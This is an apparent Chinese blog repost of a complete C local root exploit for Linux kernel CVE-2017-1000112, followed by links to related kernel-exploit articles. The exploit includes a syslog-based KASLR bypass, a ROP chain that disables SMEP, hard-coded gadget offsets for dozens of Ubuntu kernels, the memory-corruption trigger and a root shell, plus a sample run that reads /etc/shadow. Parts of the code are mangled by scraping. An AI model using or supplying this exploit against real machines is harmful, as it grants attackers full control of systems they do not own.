linux kernel ping_init_sock poc,Linux 内核 UFO-非UFO 路径切换内存破坏漏洞的 PoC(CVE-2017-1000112)...

最新推荐文章于 2021-06-18 17:22:34 发布
最新推荐文章于 2021-06-18 17:22:34 发布
阅读量186 收藏
点赞数
文章标签: linux kernel ping_init_sock poc

//A proof-of-concept local root exploit for CVE-2017-1000112.//Includes KASLR and SMEP bypasses. No SMAP bypass.//Tested on Ubuntu trusty 4.4.0-* and Ubuntu xenial 4-8-0-* kernels.//

//Usage://user@ubuntu:~$ uname -a//Linux ubuntu 4.8.0-58-generic #63~16.04.1-Ubuntu SMP Mon Jun 26 18:08:51 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux//user@ubuntu:~$ whoami//user//user@ubuntu:~$ id//uid=1000(user) gid=1000(user) groups=1000(user),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),113(lpadmin),128(sambashare)//user@ubuntu:~$ gcc pwn.c -o pwn//user@ubuntu:~$ ./pwn//[.] starting//[.] checking distro and kernel versions//[.] kernel version '4.8.0-58-generic' detected//[~] done, versions looks good//[.] checking SMEP and SMAP//[~] done, looks good//[.] setting up namespace sandbox//[~] done, namespace sandbox set up//[.] KASLR bypass enabled, getting kernel addr//[~] done, kernel text: ffffffffae400000//[.] commit_creds: ffffffffae4a5d20//[.] prepare_kernel_cred: ffffffffae4a6110//[.] SMEP bypass enabled, mmapping fake stack//[~] done, fake stack mmapped//[.] executing payload ffffffffae40008d//[~] done, should be root now//[.] checking if we got root//[+] got r00t ^_^//root@ubuntu:/home/user# whoami//root//root@ubuntu:/home/user# id//uid=0(root) gid=0(root) groups=0(root)//root@ubuntu:/home/user# cat /etc/shadow//root:!:17246:0:99999:7::://daemon:*:17212:0:99999:7::://bin:*:17212:0:99999:7::://sys:*:17212:0:99999:7::://...//

//Andrey Konovalov

#define _GNU_SOURCE#include#include#include#include#include#include#include#include#include#include#include#include#include#include#include#include

#define ENABLE_KASLR_BYPASS 1

#define ENABLE_SMEP_BYPASS 1

//Will be overwritten if ENABLE_KASLR_BYPASS is enabled.

unsigned long KERNEL_BASE = 0xffffffff81000000ul;//Will be overwritten by detect_versions().

int kernel = -1;structkernel_info {const char*distro;const char*version;

uint64_t commit_creds;

uint64_t prepare_kernel_cred;

uint64_t xchg_eax_esp_ret;

uint64_t pop_rdi_ret;

uint64_t mov_dword_ptr_rdi_eax_ret;

uint64_t mov_rax_cr4_ret;

uint64_t neg_rax_ret;

uint64_t pop_rcx_ret;

uint64_t or_rax_rcx_ret;

uint64_t xchg_eax_edi_ret;

uint64_t mov_cr4_rdi_ret;

uint64_t jmp_rcx;

};struct kernel_info kernels[] ={

{"trusty", "4.4.0-21-generic", 0x9d7a0, 0x9da80, 0x4520a, 0x30f75, 0x109957, 0x1a7a0, 0x3d6b7a, 0x1cbfc, 0x76453, 0x49d4d, 0x61300, 0x1b91d},

{"trusty", "4.4.0-22-generic", 0x9d7e0, 0x9dac0, 0x4521a, 0x28c19d, 0x1099b7, 0x1a7f0, 0x3d781a, 0x1cc4c, 0x764b3, 0x49d5d, 0x61300, 0x48040},

{"trusty", "4.4.0-24-generic", 0x9d5f0, 0x9d8d0, 0x4516a, 0x1026cd, 0x107757, 0x1a810, 0x3d7a9a, 0x1cc6c, 0x763b3, 0x49cbd, 0x612f0, 0x47fa0},

{"trusty", "4.4.0-28-generic", 0x9d760, 0x9da40, 0x4516a, 0x3dc58f, 0x1079a7, 0x1a830, 0x3d801a, 0x1cc8c, 0x763b3, 0x49cbd, 0x612f0, 0x47fa0},

{"trusty", "4.4.0-31-generic", 0x9d760, 0x9da40, 0x4516a, 0x3e223f, 0x1079a7, 0x1a830, 0x3ddcca, 0x1cc8c, 0x763b3, 0x49cbd, 0x612f0, 0x47fa0},

{"trusty", "4.4.0-34-generic", 0x9d760, 0x9da40, 0x4510a, 0x355689, 0x1079a7, 0x1a830, 0x3ddd1a, 0x1cc8c, 0x763b3, 0x49c5d, 0x612f0, 0x47f40},

{"trusty", "4.4.0-36-generic", 0x9d770, 0x9da50, 0x4510a, 0x1eec9d, 0x107a47, 0x1a830, 0x3de02a, 0x1cc8c, 0x763c3, 0x29595, 0x61300, 0x47f40},

{"trusty", "4.4.0-38-generic", 0x9d820, 0x9db00, 0x4510a, 0x598fd, 0x107af7, 0x1a820, 0x3de8ca, 0x1cc7c, 0x76473, 0x49c5d, 0x61300, 0x1a77b},

{"trusty", "4.4.0-42-generic", 0x9d870, 0x9db50, 0x4510a, 0x5f13d, 0x107b17, 0x1a820, 0x3deb7a, 0x1cc7c, 0x76463, 0x49c5d, 0x61300, 0x1a77b},

{"trusty", "4.4.0-45-generic", 0x9d870, 0x9db50, 0x4510a, 0x5f13d, 0x107b17, 0x1a820, 0x3debda, 0x1cc7c, 0x76463, 0x49c5d, 0x61300, 0x1a77b},

{"trusty", "4.4.0-47-generic", 0x9d940, 0x9dc20, 0x4511a, 0x171f8d, 0x107bd7, 0x1a820, 0x3e241a, 0x1cc7c, 0x76463, 0x299f5, 0x61300, 0x1a77b},

{"trusty", "4.4.0-51-generic", 0x9d920, 0x9dc00, 0x4511a, 0x21f15c, 0x107c77, 0x1a820, 0x3e280a, 0x1cc7c, 0x76463, 0x49c6d, 0x61300, 0x1a77b},

{"trusty", "4.4.0-53-generic", 0x9d920, 0x9dc00, 0x4511a, 0x21f15c, 0x107c77, 0x1a820, 0x3e280a, 0x1cc7c, 0x76463, 0x49c6d, 0x61300, 0x1a77b},

{"trusty", "4.4.0-57-generic", 0x9ebb0, 0x9ee90, 0x4518a, 0x39401d, 0x1097d7, 0x1a820, 0x3e527a, 0x1cc7c, 0x77493, 0x49cdd, 0x62300, 0x1a77b},

{"trusty", "4.4.0-59-generic", 0x9ebb0, 0x9ee90, 0x4518a, 0x2dbc4e, 0x1097d7, 0x1a820, 0x3e571a, 0x1cc7c, 0x77493, 0x49cdd, 0x62300, 0x1a77b},

{"trusty", "4.4.0-62-generic", 0x9ebe0, 0x9eec0, 0x4518a, 0x3ea46f, 0x109837, 0x1a820, 0x3e5e5a, 0x1cc7c, 0x77493, 0x49cdd, 0x62300, 0x1a77b},

{"trusty", "4.4.0-63-generic", 0x9ebe0, 0x9eec0, 0x4518a, 0x2e2e7d, 0x109847, 0x1a820, 0x3e61ba, 0x1cc7c, 0x77493, 0x49cdd, 0x62300, 0x1a77b},

{"trusty", "4.4.0-64-generic", 0x9ebe0, 0x9eec0, 0x4518a, 0x2e2e7d, 0x109847, 0x1a820, 0x3e61ba, 0x1cc7c, 0x77493, 0x49cdd, 0x62300, 0x1a77b},

{"trusty", "4.4.0-66-generic", 0x9ebe0, 0x9eec0, 0x4518a, 0x2e2e7d, 0x109847, 0x1a820, 0x3e61ba, 0x1cc7c, 0x77493, 0x49cdd, 0x62300, 0x1a77b},

{"trusty", "4.4.0-67-generic", 0x9eb60, 0x9ee40, 0x4518a, 0x12a9dc, 0x109887, 0x1a820, 0x3e67ba, 0x1cc7c, 0x774c3, 0x49cdd, 0x62330, 0x1a77b},

{"trusty", "4.4.0-70-generic", 0x9eb60, 0x9ee40, 0x4518a, 0xd61a2, 0x109887, 0x1a820, 0x3e63ca, 0x1cc7c, 0x774c3, 0x49cdd, 0x62330, 0x1a77b},

{"trusty", "4.4.0-71-generic", 0x9eb60, 0x9ee40, 0x4518a, 0xd61a2, 0x109887, 0x1a820, 0x3e63ca, 0x1cc7c, 0x774c3, 0x49cdd, 0x62330, 0x1a77b},

{"trusty", "4.4.0-72-generic", 0x9eb60, 0x9ee40, 0x4518a, 0xd61a2, 0x109887, 0x1a820, 0x3e63ca, 0x1cc7c, 0x774c3, 0x49cdd, 0x62330, 0x1a77b},

{"trusty", "4.4.0-75-generic", 0x9eb60, 0x9ee40, 0x4518a, 0x303cfd, 0x1098a7, 0x1a820, 0x3e67ea, 0x1cc7c, 0x774c3, 0x49cdd, 0x62330, 0x1a77b},

{"trusty", "4.4.0-78-generic", 0x9eb70, 0x9ee50, 0x4518a, 0x30366d, 0x1098b7, 0x1a820, 0x3e710a, 0x1cc7c, 0x774c3, 0x49cdd, 0x62330, 0x1a77b},

{"trusty", "4.4.0-79-generic", 0x9ebb0, 0x9ee90, 0x4518a, 0x3ebdcf, 0x1099a7, 0x1a830, 0x3e77ba, 0x1cc8c, 0x774e3, 0x49cdd, 0x62330, 0x1a78b},

{"trusty", "4.4.0-81-generic", 0x9ebb0, 0x9ee90, 0x4518a, 0x2dc688, 0x1099a7, 0x1a830, 0x3e789a, 0x1cc8c, 0x774e3, 0x24487, 0x62330, 0x1a78b},

{"trusty", "4.4.0-83-generic", 0x9ebc0, 0x9eea0, 0x451ca, 0x2dc6f5, 0x1099b7, 0x1a830, 0x3e78fa, 0x1cc8c, 0x77533, 0x49d1d, 0x62360, 0x1a78b},

{"xenial", "4.8.0-34-generic", 0xa5d50, 0xa6140, 0x17d15, 0x6854d, 0x119227, 0x1b230, 0x4390da, 0x206c23, 0x7bcf3, 0x12c7f7, 0x64210, 0x49f80},

{"xenial", "4.8.0-36-generic", 0xa5d50, 0xa6140, 0x17d15, 0x6854d, 0x119227, 0x1b230, 0x4390da, 0x206c23, 0x7bcf3, 0x12c7f7, 0x64210, 0x49f80},

{"xenial", "4.8.0-39-generic", 0xa5cf0, 0xa60e0, 0x17c55, 0xf3980, 0x1191f7, 0x1b170, 0x43996a, 0x2e8363, 0x7bcf3, 0x12c7c7, 0x64210, 0x49f60},

{"xenial", "4.8.0-41-generic", 0xa5cf0, 0xa60e0, 0x17c55, 0xf3980, 0x1191f7, 0x1b170, 0x43996a, 0x2e8363, 0x7bcf3, 0x12c7c7, 0x64210, 0x49f60},

{"xenial", "4.8.0-45-generic", 0xa5cf0, 0xa60e0, 0x17c55, 0x100935, 0x1191f7, 0x1b170, 0x43999a, 0x185493, 0x7bcf3, 0xdfc5, 0x64210, 0x49f60},

{"xenial", "4.8.0-46-generic", 0xa5cf0, 0xa60e0, 0x17c55, 0x100935, 0x1191f7, 0x1b170, 0x43999a, 0x185493, 0x7bcf3, 0x12c7c7, 0x64210, 0x49f60},

{"xenial", "4.8.0-49-generic", 0xa5d00, 0xa60f0, 0x17c55, 0x301f2d, 0x119207, 0x1b170, 0x439bba, 0x102e33, 0x7bd03, 0x12c7d7, 0x64210, 0x49f60},

{"xenial", "4.8.0-52-generic", 0xa5d00, 0xa60f0, 0x17c55, 0x301f2d, 0x119207, 0x1b170, 0x43a0da, 0x63e843, 0x7bd03, 0x12c7d7, 0x64210, 0x49f60},

{"xenial", "4.8.0-54-generic", 0xa5d00, 0xa60f0, 0x17c55, 0x301f2d, 0x119207, 0x1b170, 0x43a0da, 0x5ada3c, 0x7bd03, 0x12c7d7, 0x64210, 0x49f60},

{"xenial", "4.8.0-56-generic", 0xa5d00, 0xa60f0, 0x17c55, 0x39d50d, 0x119207, 0x1b170, 0x43a14a, 0x44d4a0, 0x7bd03, 0x12c7d7, 0x64210, 0x49f60},

{"xenial", "4.8.0-58-generic", 0xa5d20, 0xa6110, 0x17c55, 0xe56f5, 0x119227, 0x1b170, 0x439e7a, 0x162622, 0x7bd23, 0x12c7f7, 0x64210, 0x49fa0},

};//Used to get root privileges.

#define COMMIT_CREDS (KERNEL_BASE + kernels[kernel].commit_creds)

#define PREPARE_KERNEL_CRED (KERNEL_BASE + kernels[kernel].prepare_kernel_cred)

//Used when ENABLE_SMEP_BYPASS is used.//- xchg eax, esp ; ret//- pop rdi ; ret//- mov dword ptr [rdi], eax ; ret//- push rbp ; mov rbp, rsp ; mov rax, cr4 ; pop rbp ; ret//- neg rax ; ret//- pop rcx ; ret//- or rax, rcx ; ret//- xchg eax, edi ; ret//- push rbp ; mov rbp, rsp ; mov cr4, rdi ; pop rbp ; ret//- jmp rcx

#define XCHG_EAX_ESP_RET (KERNEL_BASE + kernels[kernel].xchg_eax_esp_ret)

#define POP_RDI_RET (KERNEL_BASE + kernels[kernel].pop_rdi_ret)

#define MOV_DWORD_PTR_RDI_EAX_RET (KERNEL_BASE + kernels[kernel].mov_dword_ptr_rdi_eax_ret)

#define MOV_RAX_CR4_RET (KERNEL_BASE + kernels[kernel].mov_rax_cr4_ret)

#define NEG_RAX_RET (KERNEL_BASE + kernels[kernel].neg_rax_ret)

#define POP_RCX_RET (KERNEL_BASE + kernels[kernel].pop_rcx_ret)

#define OR_RAX_RCX_RET (KERNEL_BASE + kernels[kernel].or_rax_rcx_ret)

#define XCHG_EAX_EDI_RET (KERNEL_BASE + kernels[kernel].xchg_eax_edi_ret)

#define MOV_CR4_RDI_RET (KERNEL_BASE + kernels[kernel].mov_cr4_rdi_ret)

#define JMP_RCX (KERNEL_BASE + kernels[kernel].jmp_rcx)

//* * * * * * * * * * * * * * * Getting root * * * * * * * * * * * * * * * *

typedef unsignedlong __attribute__((regparm(3))) (*_commit_creds)(unsigned longcred);

typedef unsignedlong __attribute__((regparm(3))) (*_prepare_kernel_cred)(unsigned longcred);void get_root(void) {

((_commit_creds)(COMMIT_CREDS))(

((_prepare_kernel_cred)(PREPARE_KERNEL_CRED))(0));

}//* * * * * * * * * * * * * * * * SMEP bypass * * * * * * * * * * * * * * * *

uint64_t saved_esp;//Unfortunately GCC does not support `__atribute__((naked))` on x86, which//can be used to omit a function's prologue, so I had to use this weird//wrapper hack as a workaround. Note: Clang does support it, which means it//has better support of GCC attributes than GCC itself. Funny.

voidwrapper() {

asmvolatile ("

payload:

movq%%rbp, %%rax

movq $0xffffffff00000000, %%rdx

andq%%rdx, %%rax

movq%0, %%rdx

addq%%rdx, %%rax

movq%%rax, %%rsp

call get_root

ret": :"m"(saved_esp) : );

}voidpayload();#define CHAIN_SAVE_ESP

*stack++ =POP_RDI_RET;*stack++ = (uint64_t)&saved_esp;*stack++ =MOV_DWORD_PTR_RDI_EAX_RET;#define SMEP_MASK 0x100000

#define CHAIN_DISABLE_SMEP

*stack++ =MOV_RAX_CR4_RET;*stack++ =NEG_RAX_RET;*stack++ =POP_RCX_RET;*stack++ =SMEP_MASK;*stack++ =OR_RAX_RCX_RET;*stack++ =NEG_RAX_RET;*stack++ =XCHG_EAX_EDI_RET;*stack++ =MOV_CR4_RDI_RET;#define CHAIN_JMP_PAYLOAD

*stack++ =POP_RCX_RET;*stack++ = (uint64_t)&payload;*stack++ =JMP_RCX;voidmmap_stack() {

uint64_t stack_aligned, stack_addr;intpage_size, stack_size, stack_offset;

uint64_t*stack;

page_size=getpagesize();

stack_aligned= (XCHG_EAX_ESP_RET & 0x00000000fffffffful) & ~(page_size - 1);

stack_addr= stack_aligned - page_size * 4;

stack_size= page_size * 8;

stack_offset= XCHG_EAX_ESP_RET %page_size;

stack= mmap((void*)stack_addr, stack_size, PROT_READ |PROT_WRITE,

MAP_FIXED| MAP_ANONYMOUS | MAP_PRIVATE, -1, 0);if (stack == MAP_FAILED || stack != (void*)stack_addr) {

perror("[-] mmap()");

exit(EXIT_FAILURE);

}

stack= (uint64_t*)((char*)stack_aligned +stack_offset);

CHAIN_SAVE_ESP;

CHAIN_DISABLE_SMEP;

CHAIN_JMP_PAYLOAD;

}//* * * * * * * * * * * * * * syslog KASLR bypass * * * * * * * * * * * * * *

#define SYSLOG_ACTION_READ_ALL 3

#define SYSLOG_ACTION_SIZE_BUFFER 10

void mmap_syslog(char** buffer, int*size) {*size = klogctl(SYSLOG_ACTION_SIZE_BUFFER, 0, 0);if (*size == -1) {

perror("[-] klogctl(SYSLOG_ACTION_SIZE_BUFFER)");

exit(EXIT_FAILURE);

}*size = (*size / getpagesize() + 1) *getpagesize();*buffer = (char*)mmap(NULL, *size, PROT_READ |PROT_WRITE,

MAP_PRIVATE| MAP_ANONYMOUS, -1, 0);*size = klogctl(SYSLOG_ACTION_READ_ALL, &((*buffer)[0]), *size);if (*size == -1) {

perror("[-] klogctl(SYSLOG_ACTION_READ_ALL)");

exit(EXIT_FAILURE);

}

}

unsignedlong get_kernel_addr_trusty(char* buffer, intsize) {const char* needle1 = "Freeing unused";char* substr = (char*)memmem(&buffer[0], size, needle1, strlen(needle1));if (substr ==NULL) {

fprintf(stderr,"[-] substring '%s' not found in syslog", needle1);

exit(EXIT_FAILURE);

}int start = 0;int end = 0;for (end = start; substr[end] != '-'; end++);const char* needle2 = "ffffff";

substr= (char*)memmem(&substr[start], end -start, needle2, strlen(needle2));if (substr ==NULL) {

fprintf(stderr,"[-] substring '%s' not found in syslog", needle2);

exit(EXIT_FAILURE);

}char* endptr = &substr[16];

unsignedlong r = strtoul(&substr[0], &endptr, 16);

r&= 0xffffffffff000000ul;returnr;

}

unsignedlong get_kernel_addr_xenial(char* buffer, intsize) {const char* needle1 = "Freeing unused";char* substr = (char*)memmem(&buffer[0], size, needle1, strlen(needle1));if (substr ==NULL) {

fprintf(stderr,"[-] substring '%s' not found in syslog", needle1);

exit(EXIT_FAILURE);

}int start = 0;int end = 0;for (start = 0; substr[start] != '-'; start++);for (end = start; substr[end] != ''; end++);const char* needle2 = "ffffff";

substr= (char*)memmem(&substr[start], end -start, needle2, strlen(needle2));if (substr ==NULL) {

fprintf(stderr,"[-] substring '%s' not found in syslog", needle2);

exit(EXIT_FAILURE);

}char* endptr = &substr[16];

unsignedlong r = strtoul(&substr[0], &endptr, 16);

r&= 0xfffffffffff00000ul;

r-= 0x1000000ul;returnr;

}

unsignedlongget_kernel_addr() {char*syslog;intsize;

mmap_syslog(&syslog, &size);if (strcmp("trusty", kernels[kernel].distro) == 0 &&strncmp("4.4.0", kernels[kernel].version, 5) == 0)returnget_kernel_addr_trusty(syslog, size);if (strcmp("xenial", kernels[kernel].distro) == 0 &&strncmp("4.8.0", kernels[kernel].version, 5) == 0)returnget_kernel_addr_xenial(syslog, size);

printf("[-] KASLR bypass only tested on trusty 4.4.0-* and xenial 4-8-0-*");

exit(EXIT_FAILURE);

}//* * * * * * * * * * * * * * Kernel structs * * * * * * * * * * * * * * * *

structubuf_info {

uint64_t callback;//void (*callback)(struct ubuf_info *, bool)

uint64_t ctx; //void *

uint64_t desc; //unsigned long

};structskb_shared_info {

uint8_t nr_frags;//unsigned char

uint8_t tx_flags; //__u8

uint16_t gso_size; //unsigned short

uint16_t gso_segs; //unsigned short

uint16_t gso_type; //unsigned short

uint64_t frag_list; //struct sk_buff *

uint64_t hwtstamps; //struct skb_shared_hwtstamps

uint32_t tskey; //u32

uint32_t ip6_frag_id; //__be32

uint32_t dataref; //atomic_t

uint64_t destructor_arg; //void *

uint8_t frags[16][17]; //skb_frag_t frags[MAX_SKB_FRAGS];

};structubuf_info ui;void init_skb_buffer(char* buffer, unsigned longfunc) {struct skb_shared_info* ssi = (struct skb_shared_info*)buffer;

memset(ssi,0, sizeof(*ssi));

ssi->tx_flags = 0xff;

ssi->destructor_arg = (uint64_t)&ui;

ssi->nr_frags = 0;

ssi->frag_list = 0;

ui.callback=func;

}//* * * * * * * * * * * * * * * Trigger * * * * * * * * * * * * * * * * * *

#define SHINFO_OFFSET 3164

void oob_execute(unsigned longpayload) {char buffer[4096];

memset(&buffer[0], 0x42, 4096);

init_skb_buffer(&buffer[SHINFO_OFFSET], payload);int s = socket(PF_INET, SOCK_DGRAM, 0);if (s == -1) {

perror("[-] socket()");

exit(EXIT_FAILURE);

}structsockaddr_in addr;

memset(&addr, 0, sizeof(addr));

addr.sin_family=AF_INET;

addr.sin_port= htons(8000);

addr.sin_addr.s_addr=htonl(INADDR_LOOPBACK);if (connect(s, (void*)&addr, sizeof(addr))) {

perror("[-] connect()");

exit(EXIT_FAILURE);

}int size = SHINFO_OFFSET + sizeof(structskb_shared_info);int rv =send(s, buffer, size, MSG_MORE);if (rv !=size) {

perror("[-] send()");

exit(EXIT_FAILURE);

}int val = 1;

rv= setsockopt(s, SOL_SOCKET, SO_NO_CHECK, &val, sizeof(val));if (rv != 0) {

perror("[-] setsockopt(SO_NO_CHECK)");

exit(EXIT_FAILURE);

}

send(s, buffer,1, 0);

close(s);

}//* * * * * * * * * * * * * * * * * Detect * * * * * * * * * * * * * * * * *

#define CHUNK_SIZE 1024

int read_file(const char* file, char* buffer, intmax_length) {int f =open(file, O_RDONLY);if (f == -1)return -1;int bytes_read = 0;while (true) {int bytes_to_read =CHUNK_SIZE;if (bytes_to_read > max_length -bytes_read)

bytes_to_read= max_length -bytes_read;int rv = read(f, &buffer[bytes_read], bytes_to_read);if (rv == -1)return -1;

bytes_read+=rv;if (rv == 0)returnbytes_read;

}

}#define LSB_RELEASE_LENGTH 1024

void get_distro_codename(char* output, intmax_length) {charbuffer[LSB_RELEASE_LENGTH];int length = read_file("/etc/lsb-release", &buffer[0], LSB_RELEASE_LENGTH);if (length == -1) {

perror("[-] open/read(/etc/lsb-release)");

exit(EXIT_FAILURE);

}const char *needle = "DISTRIB_CODENAME=";int needle_length =strlen(needle);char* found = memmem(&buffer[0], length, needle, needle_length);if (found ==NULL) {

printf("[-] couldn't find DISTRIB_CODENAME in /etc/lsb-release");

exit(EXIT_FAILURE);

}inti;for (i = 0; found[needle_length + i] != ''; i++) {

assert(i

assert((found- &buffer[0]) + needle_length + i

output[i]= found[needle_length +i];

}

}void get_kernel_version(char* output, intmax_length) {structutsname u;int rv = uname(&u);if (rv != 0) {

perror("[-] uname())");

exit(EXIT_FAILURE);

}

assert(strlen(u.release)<=max_length);

strcpy(&output[0], u.release);

}#define ARRAY_SIZE(x) (sizeof(x) / sizeof((x)[0]))

#define DISTRO_CODENAME_LENGTH 32

#define KERNEL_VERSION_LENGTH 32

voiddetect_versions() {charcodename[DISTRO_CODENAME_LENGTH];charversion[KERNEL_VERSION_LENGTH];

get_distro_codename(&codename[0], DISTRO_CODENAME_LENGTH);

get_kernel_version(&version[0], KERNEL_VERSION_LENGTH);inti;for (i = 0; i < ARRAY_SIZE(kernels); i++) {if (strcmp(&codename[0], kernels[i].distro) == 0 &&strcmp(&version[0], kernels[i].version) == 0) {

printf("[.] kernel version '%s' detected", kernels[i].version);

kernel=i;return;

}

}

printf("[-] kernel version not recognized");

exit(EXIT_FAILURE);

}#define PROC_CPUINFO_LENGTH 4096

//0 - nothing, 1 - SMEP, 2 - SMAP, 3 - SMEP & SMAP

intsmap_smep_enabled() {charbuffer[PROC_CPUINFO_LENGTH];int length = read_file("/proc/cpuinfo", &buffer[0], PROC_CPUINFO_LENGTH);if (length == -1) {

perror("[-] open/read(/proc/cpuinfo)");

exit(EXIT_FAILURE);

}int rv = 0;char* found = memmem(&buffer[0], length, "smep", 4);if (found !=NULL)

rv+= 1;

found= memmem(&buffer[0], length, "smap", 4);if (found !=NULL)

rv+= 2;returnrv;

}voidcheck_smep_smap() {int rv =smap_smep_enabled();if (rv >= 2) {

printf("[-] SMAP detected, no bypass available");

exit(EXIT_FAILURE);

}#if !ENABLE_SMEP_BYPASS

if (rv >= 1) {

printf("[-] SMEP detected, use ENABLE_SMEP_BYPASS");

exit(EXIT_FAILURE);

}#endif}//* * * * * * * * * * * * * * * * * Main * * * * * * * * * * * * * * * * * *

static bool write_file(const char* file, const char*what, ...) {char buf[1024];

va_list args;

va_start(args, what);

vsnprintf(buf,sizeof(buf), what, args);

va_end(args);

buf[sizeof(buf) - 1] = 0;int len =strlen(buf);int fd = open(file, O_WRONLY |O_CLOEXEC);if (fd == -1)return false;if (write(fd, buf, len) !=len) {

close(fd);return false;

}

close(fd);return true;

}voidsetup_sandbox() {int real_uid =getuid();int real_gid =getgid();if (unshare(CLONE_NEWUSER) != 0) {

printf("[!] unprivileged user namespaces are not available");

perror("[-] unshare(CLONE_NEWUSER)");

exit(EXIT_FAILURE);

}if (unshare(CLONE_NEWNET) != 0) {

perror("[-] unshare(CLONE_NEWUSER)");

exit(EXIT_FAILURE);

}if (!write_file("/proc/self/setgroups", "deny")) {

perror("[-] write_file(/proc/self/set_groups)");

exit(EXIT_FAILURE);

}if (!write_file("/proc/self/uid_map", "0 %d 1", real_uid)) {

perror("[-] write_file(/proc/self/uid_map)");

exit(EXIT_FAILURE);

}if (!write_file("/proc/self/gid_map", "0 %d 1", real_gid)) {

perror("[-] write_file(/proc/self/gid_map)");

exit(EXIT_FAILURE);

}

cpu_set_t my_set;

CPU_ZERO(&my_set);

CPU_SET(0, &my_set);if (sched_setaffinity(0, sizeof(my_set), &my_set) != 0) {

perror("[-] sched_setaffinity()");

exit(EXIT_FAILURE);

}if (system("/sbin/ifconfig lo mtu 1500") != 0) {

perror("[-] system(/sbin/ifconfig lo mtu 1500)");

exit(EXIT_FAILURE);

}if (system("/sbin/ifconfig lo up") != 0) {

perror("[-] system(/sbin/ifconfig lo up)");

exit(EXIT_FAILURE);

}

}voidexec_shell() {char* shell = "/bin/bash";char* args[] = {shell, "-i", NULL};

execve(shell, args, NULL);

}boolis_root() {//We can't simple check uid, since we're running inside a namespace//with uid set to 0. Try opening /etc/shadow instead.

int fd = open("/etc/shadow", O_RDONLY);if (fd == -1)return false;

close(fd);return true;

}voidcheck_root() {

printf("[.] checking if we got root");if (!is_root()) {

printf("[-] something went wrong =(");return;

}

printf("[+] got r00t ^_^");

exec_shell();

}int main(int argc, char**argv) {

printf("[.] starting");

printf("[.] checking distro and kernel versions");

detect_versions();

printf("[~] done, versions looks good");

printf("[.] checking SMEP and SMAP");

check_smep_smap();

printf("[~] done, looks good");

printf("[.] setting up namespace sandbox");

setup_sandbox();

printf("[~] done, namespace sandbox set up");#if ENABLE_KASLR_BYPASSprintf("[.] KASLR bypass enabled, getting kernel addr");

KERNEL_BASE=get_kernel_addr();

printf("[~] done, kernel text: %lx", KERNEL_BASE);#endifprintf("[.] commit_creds: %lx", COMMIT_CREDS);

printf("[.] prepare_kernel_cred: %lx", PREPARE_KERNEL_CRED);

unsignedlong payload = (unsigned long)&get_root;#if ENABLE_SMEP_BYPASSprintf("[.] SMEP bypass enabled, mmapping fake stack");

mmap_stack();

payload=XCHG_EAX_ESP_RET;

printf("[~] done, fake stack mmapped");#endifprintf("[.] executing payload %lx", payload);

oob_execute(payload);

printf("[~] done, should be root now");

check_root();return 0;

}

weixin_39870150
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
CVE-2017-16995脚本
03-20
Ubuntu本地内核提权,用于大家一起学习,更好的维护好系统
Linux 内核 UFO-UFO 路径切换内存破坏漏洞PoC(CVE-2017-1000112)
angaoux03775的博客
08-14 325
// A proof-of-concept local root exploit for CVE-2017-1000112. // Includes KASLR and SMEP bypasses. No SMAP bypass. // Tested on Ubuntu trusty 4.4.0-* and Ubuntu xenial 4-8-0-* kernels. // ...
kernel exploit】CVE-2017-1000112 UDP报文处理不一致导致堆溢出
panhewu9919的博客
06-18 772
影响版本:<=Linux 4.12.6 v4.12.7已修补。 7.0分。由syzkaller发现。 测试版本:Linux-4.12.6 exploit及测试环境下载地址—https://github.com/bsauce/kernel-exploit-factory 编译选项: CONFIG_SLAB=y General setup —> Choose SLAB allocator (SLUB (Unqueued Allocator)) —> SLAB 在编译时将.co
linux kernel ping_init_sock poc,Kernel Pwn 学习之路 - 番外
weixin_35675138的博客
05-13 377
0x01 前言由于关于Kernel安全的文章实在过于繁杂,本文有部分内容大篇幅或全文引用了参考文献,若出现此情况的,将在相关内容的开头予以说明,部分引用参考文献的将在文件结尾的参考链接中注明。从本篇番外开始,将会记录在CTF中Kernel Pwn的一些思路,由于与Kernel Pwn 学习之路(X)系列的顺序学习路径有区别,故单独以番外的形式呈现。本文将会以实例来说几个Linux提权思路,本文主要...
s2——053远程代码执行漏洞CVE-2017-1000112)
Stephen Wolf
11-23 892
一、漏洞简述: Struts2在使用Freemarker模板引擎的时候,同时允许解析OGNL表达式。导致用户输入的数据本身不会被OGNL解析,但由于被Freemarker解析一次后变成离开一个表达式,被OGNL解析第二次,导致任意命令执行漏洞。 当开发者在Freemarker标签中使用如下代码时<@s.hidden name=”redirectUri” valu...
linux kernel ping_init_sock poc,Linux 内核 AF_VSOCK 套接字条件竞争漏洞CVE-2021-26708)分析...
weixin_39852647的博客
05-13 303
一、漏洞背景近期,国外安全研究人员在oss-security上披露了一个AF_VSOCK套接字条件竞争高危漏洞CVE-2021-26708(CNVD-2021-10822、CNNVD-202102-529)。根据披露细节,该漏洞是由于错误加锁导致,可以在低权限下触发并自动加载易受攻击驱动模块创建AF_VSOCK套接字,进而导致本地权限提升。该漏洞补丁已经合并到Linux内核主线中。二、VSOCK介...
SOCK_RAW-FOR-Linux.rar_RAW_SOCK_RAW perl_linux sock raw_sock_ra
09-24
Linux操作系统中,SOCK_RAW是一种特殊的套接字类型,它允许程序员访问网络协议栈的底层功能,从而能够实现自定义的网络协议或者获取原始数据包。本篇将深入探讨SOCK_RAW的工作原理及其在Perl语言中的应用。 一、...
ntp.rar_c ntp_linux NTP_linux-ntp.rar_ntp_ntp linux
09-20
Linux系统中,NTP(Network Time Protocol,网络时间协议)是一种用于同步计算机时钟的协议,确保网络中的设备时间保持一致。NTP协议在分布式系统、云计算和高精度时间同步应用中至关重要。本资源提供了关于Linux...
socket-windows-and-linux.zip_Linux windows socket_linux c++ sock
09-21
标题"socket-windows-and-linux.zip_Linux windows socket_linux c++ sock"表明了本主题涉及的是跨平台的Socket编程,主要关注Linux和Windows操作系统下,使用C++语言实现的Socket接口。描述提到"利用socket函数实现...
SOCK_RAW_using_in_linux.rar_RAW_linux sock raw_raw sock_sock RAW
09-23
Linux操作系统中,SOCK_RAW是一种特殊的套接字类型,它允许程序员访问网络协议栈的底层,从而可以发送和接收原始的数据包,而不局限于特定的网络协议。这种类型的套接字通常用于创建自定义的网络协议,或者进行...
Linux-socket-TCP-ClientServer.zip_TCP socket_linux socket_linux
09-21
